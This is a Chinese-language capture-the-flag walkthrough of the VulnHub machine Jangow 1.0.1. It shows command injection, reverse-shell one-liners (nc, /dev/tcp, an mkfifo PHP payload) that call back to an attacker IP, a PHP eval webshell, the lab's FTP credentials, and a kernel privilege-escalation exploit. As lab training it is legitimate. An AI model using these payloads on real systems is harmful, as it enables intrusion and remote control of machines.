vulnhub:jangow1.0.1靶机

一、信息收集

扫描ip地址

扫描开放的端口

访问80端口

网站指纹识别,没找到CMS

扫描目录

二、信息利用

在主页发现buscar参数可疑

试试参数,发现可以执行命令

反弹shell:

nc -e /bin/bash 192.168.72.128 9696

bash -i >& /dev/tcp/192.168.72.128/9696 0>&1

无法反弹shell

三、漏洞攻击

试试写入一句话木马

echo "<?php @eval($_REQUEST[88888]); ?>" > ./one.php

蚁剑链接木马文件

在网站家目录找到第一个flag

又发现两个文件内容含有账号密码

尝试登录ftp,使用上面的两个账户密码

账户: jangow01  密码:abygurl69 ,登录成功没有什么发现

反弹shell,nc -e参数不支持,bash -i也不支持

换个语句:<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.72.128 9696 >/tmp/f");?>

写入文件2.php,并用浏览器访问2.php,进行反弹用户的shell

发现反弹不成功,试了很多反弹命令都不成功,可能是端口限制

试试https的443与http的80、一般服务器都不会限制这些端口,访问2.php并监听443

成功反弹shell,查看系统的版本内核信息

四、提权

查询系统版本的漏洞

下载脚本到当前位置

查看脚本文件的使用方法

将45010.c通过蚁剑上传到靶机目录下(建议把源文件先上传到靶机再编译)

赋予执行文件执行权限

chmod +x 45010.c

编译45010.c文件

gcc 45010.c -o 45010

执行编译后的文件

拿到root权限

完成。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值